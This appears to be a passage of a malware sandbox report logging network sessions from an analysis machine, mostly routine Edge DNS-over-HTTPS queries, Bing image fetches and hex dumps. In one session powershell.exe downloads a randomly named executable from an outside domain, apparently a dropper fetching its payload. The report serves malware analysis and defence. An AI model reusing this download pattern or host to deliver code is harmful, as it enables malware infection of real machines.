                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: ad 23 5a b4 74 33 95 3a 53 67 36 ba 24 70 49 f2 c7 48 da 5e ef 99 63 f9 ab a6 8e 7b 16 8f e6 92 3d d4 92 35 b0 f9 9b ee d5 fd 62 a7 54 43 a3 4d 1c b5 f5 bc f1 41 b5 a0 ac 96 8d bf 8a 3f 9a bb 6b 8b dd 37 fd 5b 49 54 2f 24 d3 3f e7 a4 75 b5 3c 44 91 8d 4a 30 b6 87 37 22 37 c9 22 d4 da 7e 99 7d 7f 26 db 78 e4 f9 6b a7 d2 6c ac 75 1d fe 5f dd 5f e0 ae bb c3 76 76 d6 bb 1b cb 8f 75 15 31 ae 3a 05 2c 27 35 92 d8 f2 bf ec bd 4d 67 f2 e6 82 74 6a de f0 fe 89 2a 6c f3 be 5a f5 0b 8b 48 25 f9 bc b8 f7 2a 57 31 a8 4c a9 3f fc 0e b9 67 8d 95 48 e8 b5 3a 63 83 50 64 31 d8 79 12 6e 8e 49 36 d5 8f 37 3f 7a 4f 9a 9b 1c ed e5 fc d2 7c b4 c9 8a f9 9e 65 71 bf 79 dd 9d 51 56 26 8e 6d b4 f5 9b 7c 9b 5b ee d5 05 9e 86 97 6c 75 3c a8 77 2f 4d b7 ef 2d 79 9f ed 9d a8 b5 9f ec
                                                                                                                                                                                                                  Data Ascii: #Zt3:Sg6$pIH^c{=5bTCMA?k7[IT/$?u<DJ07"7"~}&xklu__vvu1:,'5Mgtj*lZH%*W1L?gH:cPd1ynI67?zO|eqyQV&m|[lu<w/M-y
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: cb bb 9f 9a bc fa 95 5a d8 e9 84 6e cf d0 8d 3f e2 bf c3 9b fb a7 b7 ff 00 84 c2 c6 2d b3 32 fc ff 00 77 85 fe 13 fd da e7 b5 0f da 1f e1 15 85 f4 d6 eb ae dd 5d 32 ee de f6 f6 ad b7 8f 7a f8 63 4d b8 97 ec 29 1c 97 7b 55 3f 83 fb f4 9a a6 a9 3d ac ea b6 f6 90 45 e6 fc ae ef f3 7d 2b 08 e2 ea 39 38 dc bf 62 92 b9 ef fe 22 fd a8 3c 47 aa 78 d3 fb 53 4f d2 63 b5 b7 d2 e6 55 b1 b7 f3 db ca 75 19 f9 e4 4f e2 dd 57 3e 39 7e d2 52 78 87 e1 0c 36 3e 1f 82 4d 2f 5e b8 bb 55 d5 1e 1f 95 76 f5 cc 7d c6 6b e6 ed 3c df 5c 47 35 f4 69 b5 57 f8 3f 8b ff 00 d5 4e d5 b5 14 9e d5 a6 b8 f2 d5 57 fb 9f c6 c2 b9 9c ea fb 5b dc 6a 37 47 ab 7c 37 f8 e7 e3 6f 07 ea b6 f0 c9 7f 3d e6 8f e7 2c f7 d6 f3 7e f5 9f 3f 78 6e 3f 76 bb 4f 8a 5f b4 b6 a1 ae f8 82 5d 1f c1 f6 3f 63 d3 65
                                                                                                                                                                                                                  Data Ascii: Zn?-2w]2zcM){U?=E}+98b"<GxSOcUuOW>9~Rx6>M/^Uv}k<\G5iW?NW[j7G|7o=,~?xn?vO_]?ce


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49741 | Destination IP: 147.45.49.155 | Destination Port: 443 | PID: 612 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:10 UTC | 82 | OUT | GET /PefjSkkhb.exe HTTP/1.1
                                                                                                                                                                                                                  Host: tiffany-careers.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-18 20:06:10 UTC | 439 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  etag: "108a00-675eb102-2534d;;;"
                                                                                                                                                                                                                  last-modified: Sun, 15 Dec 2024 10:35:46 GMT
                                                                                                                                                                                                                  content-type: application/x-executable
                                                                                                                                                                                                                  content-length: 1083904
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 20:06:10 GMT
                                                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                  connection: close


Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 49754 | Destination IP: 20.198.118.190 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:14 UTC | 71 | OUT | CNT 1 CON 305
MS-CV: gN0rWrzYQ0maAl5f.1
Context: c143edf314d10b95
2024-12-18 20:06:14 UTC | 249 | OUT | <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:06:14 UTC | 1084 | OUT
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gN0rWrzYQ0maAl5f.2Context: c143edf314d10b95<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:06:14 UTC | 74 | OUT | BND 3 CON\QOS 56
MS-CV: gN0rWrzYQ0maAl5f.3
Context: c143edf314d10b95
2024-12-18 20:06:14 UTC | 14 | IN | 202 1 CON 58
2024-12-18 20:06:14 UTC | 58 | IN | MS-CV: L+jiEr2oa0mm/Dh1KvkBGg.0
Payload parsing failed.


Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 49765 | Destination IP: 172.64.41.3 | Destination Port: 443 | PID: 7816 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:16 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-18 20:06:17 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c399fa4344-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49764 | 172.64.41.3 | 443 | 7816 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:16 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-18 20:06:17 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c39a0f4380-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 09 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49766 | 162.159.61.3 | 443 | 7816 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:16 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  2024-12-18 20:06:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-18 20:06:17 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:16 GMT
                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                  CF-RAY: 8f41c5c40cdc8c3f-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ed 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49735 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:17 UTC | 346 | OUT | GET /th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-18 20:06:17 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 884075
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: F3215D4E244B43F58ACF8C3D973F0A2E Ref B: EWR30EDGE1417 Ref C: 2024-12-18T20:06:17Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:17 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Data Ascii: tG#Rk}paQ;qB6xg]'^em,mo]YC7JGm#fi tB=o7NVnN7=7S=k#my.$/jR#l5KWK++oi./Hl5Y4W/#I{
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: af 77 71 75 26 9b e5 e9 d6 f2 6c bc 89 25 92 4d f7 11 ab fc ad 04 59 67 7f 99 5b e6 ae b3 c2 f1 6b 5a a5 ad cc 7a ee 99 35 9e 8f 26 b5 61 79 7b 7a 25 44 8a de 5b a8 7c 98 d1 15 be 6f de 79 5f c1 ff 00 a0 d7 1d 58 da 77 8f 53 ae 9e cd 33 67 c3 3e 21 fb 25 df fc 22 1a 8f f6 7d c4 71 de a5 a6 9b ad 58 ea 09 fe 8e 9b de 6f dc f9 9b be fb 6f ff 00 be f1 54 3e 3b e9 93 f9 5f eb bc b8 fc c7 d4 e4 b6 8b f7 c9 f3 7e ef fe 01 b5 be f7 fb f5 3e 81 f1 13 c2 fa 26 b9 b1 34 1b 49 23 fb 6f da 3c cb 18 b7 be d6 4f 2f ec ff 00 bd fe 18 eb 4b c6 9a 9c 1a 9c 32 41 75 a3 c3 6f 69 1c 69 71 6d 1c b2 a7 93 1b c9 fe b1 24 f9 b7 7c db ff 00 ca d7 24 5d aa 27 6b 22 a7 b9 e2 76 ab 25 c5 a6 fb 2b 3f f8 f7 8f f7 91 db 45 bf e4 fe 27 6a a7 a9 45 25 dd a4 77 50 fe f2 38 f7 c7 25 b5 5c
                                                                                                                                                                                                                  Data Ascii: wqu&l%MYg[kZz5&ay{z%D[|oy_XwS3g>!%"}qXooT>;_~>&4I#o<O/K2Auoiiqm$|$]'k"v%+?E'jE%wP8%\
                                                                                                                                                                                                                  2024-12-18 20:06:18 UTC16384INData Raw: 46 8f 67 f6 7f dd ff 00 ab b6 ff 00 96 8f ff 00 3d 1b fb d5 34 a9 36 f9 a4 b7 1c a7 6d 11 9d e3 19 fe d7 ad ff 00 a2 f9 d2 79 7f bb b6 fe ff 00 95 fc 34 30 9f 4c d3 e2 d4 6d a5 b5 91 fc cd 9e 64 5f 3e c6 64 fb ad 5b 7a 56 8b 68 b0 c9 fe a7 cc b8 8f fe 5a ff 00 b5 51 5a db 40 f7 7f d9 70 69 bf 68 92 4d fe 5c 7f f3 d3 f8 ab a9 54 5b 18 f2 bb 9c fc 93 c9 71 17 9f 24 32 fe f2 4f f5 92 7f b3 57 2c 7c 89 ad 3c 99 21 f9 3f e5 9f ee ab 67 c4 7a 42 45 a4 d8 fd 97 ec 9e 47 98 f1 c7 ff 00 3d a3 fe f5 60 cf 2f 95 a8 47 b3 fd 5c 9f bb f2 ff 00 f1 da 39 94 96 83 69 c5 97 e3 f3 12 1f 22 78 7c b9 3c c7 ff 00 5b f7 eb 53 4d 5d 26 58 6e 7f e7 a4 76 df f2 d7 fe 7a af df f4 f9 6b 3b 51 5b 4f ec 9f 25 2f 26 92 79 3f d2 3c cf e0 8f fd 86 fa 56 57 d8 e7 97 49 fb 6a 4d f2 47 27
                                                                                                                                                                                                                  Data Ascii: Fg=46my40Lmd_>d[zVhZQZ@pihM\T[q$2OW,|<!?gzBEG=`/G\9i"x|<[SM]&Xnvzk;Q[O%/&y?<VWIjMG'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49734 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:17 UTC | 346 | OUT | GET /th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-18 20:06:17 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 832073
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: EC40E017DD1B4692B93557929D5F2E83 Ref B: EWR30EDGE0415 Ref C: 2024-12-18T20:06:17Z
Date: Wed, 18 Dec 2024 20:06:16 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49772 | 162.159.61.3 | 443 | 7816 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-18 20:06:17 UTC | 128 | OUT | Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  15192.168.2.649774172.64.41.34437816C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                  Content-Type: application/dns-message


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49791 | 142.250.181.65 | 443 | 7816 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:20 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-18 20:06:21 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                  Expires: Thu, 18 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                  Age: 14886
                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49805 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:24 UTC | 375 | OUT | GET /th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-18 20:06:24 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 554838
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: C4AA718E3FF04837B29A177D82EA301A Ref B: EWR30EDGE0120 Ref C: 2024-12-18T20:06:24Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:24 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Data Ascii: #E5\TamM)E'Ze-l(Xk[m/j?b'fctNkW3rxToZ8UC#EEm'Jn~S)3{x'V5[Ynw?E#f|qGn.#xuE$ji|U!KUyw^o0[yP*n_XvVL(k_1
